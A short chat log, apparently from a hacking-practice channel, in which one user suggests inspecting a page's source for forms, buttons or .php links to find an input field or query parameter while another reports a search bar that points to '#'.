I was looking at it because usually there are some hints in there, I guess I'm still lost inspecting this page trying to find something that points somewhere. Everything just seems to point to '#'

rustic sage
high zinc
#

try opening the page source (right click, show source -- or Ctrl+U) and search for things like "form" or "button" or ".php" or ".asp" and similar

#

usually you'll stumble over a text field that you can interact with though

#

but

#

it might also be a query parameter for some table that is being displayed

valid oxide
#

there is a search bar on the site but it just points to '#' and doesn't do anything

#

I'll check the source